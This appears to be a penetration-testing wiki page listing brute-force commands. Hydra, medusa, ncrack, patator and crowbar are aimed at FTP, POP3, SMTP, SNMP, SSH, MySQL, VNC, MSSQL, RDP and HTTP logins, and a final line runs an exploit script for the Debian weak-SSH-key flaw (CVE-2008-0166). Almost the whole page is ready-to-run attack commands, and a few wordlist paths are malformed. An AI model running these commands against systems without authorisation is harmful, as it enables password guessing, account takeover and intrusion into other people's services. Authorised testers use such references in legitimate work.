Brute forcing

Penetration Testing Wiki

hydra

Attack FTP:

hydra -l $USERNAME -P /usr/share/wordlistsnmap.lst -f $IP ftp -V

Attack POP3:

hydra -l $USERNAME -P /usr/share/wordlistsnmap.lst -f $IP pop3 -V

Attack SMTP:

hydra -P /usr/share/wordlistsnmap.lst $IP smtp -V

Attack SNMP:

hydra -P /usr/share/wordlists/snmp.txt -v $IP snmp

Attack HTTP form:

hydra -l [email protected] -I -P cewl.txt $IP http-post-form "/$SCRIPT_PATH:Action=Login&User=^USER^&Password=^PASS^:Login failed" -V

Attack SSH (OpenSSH):

hydra -l root -P /usr/share/wordlists/rockyou.txt $IP ssh
hydra -t 4 -L users.txt -P pass.txt -M targets.txt ssh

Attack MySQL:

hydra -l root -P /usr/share/wordlists/rockyou.txt $IP mysql

Attack VNC:

hydra -P /usr/share/wordlists/rockyou.txt $IP -t 1 vnc

Check credentials for MS SQL:

hydra -l sa -p PASSWORD mssql://$IP

Check credentials for MS SQL on different port:

hydra -l sa -p password mssql://$IP:27900

Medusa

Attack HTTP Basic authentication against phpmyadmin directory:

medusa -h $IP -u admin -P /usr/share/wordlists/megacorp.txt -m DIR:/phpmyadmin/ -t 10 -M http

Attack FTP:

medusa -u kevin -P /usr/share/wordlists/megacorp-last.txt -h $IP -M ftp -t 10

List available modules:

ls /usr/lib/medusa/modules/

Other tools for brute forcing:

ncrack -vv --user Administrator -P /usr/share/wordlists/megacorp.txt rdp://$IP
patator ftp_login host=$IP user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:mesg=Login incorrect. -x ignore,reset,retry:code=500
./crowbar.py -b rdp -s $IP/24 -U /root/Desktop/userlist -C /root/Desktop/passlist -d
./crowbar.py -b sshkey -s $IP/24 -u root -k /root/.ssh/ -d
python CVE-2008-0166-Debian-ssh-PRNG.py TOOLS/rsa/2048 $IP root 22 6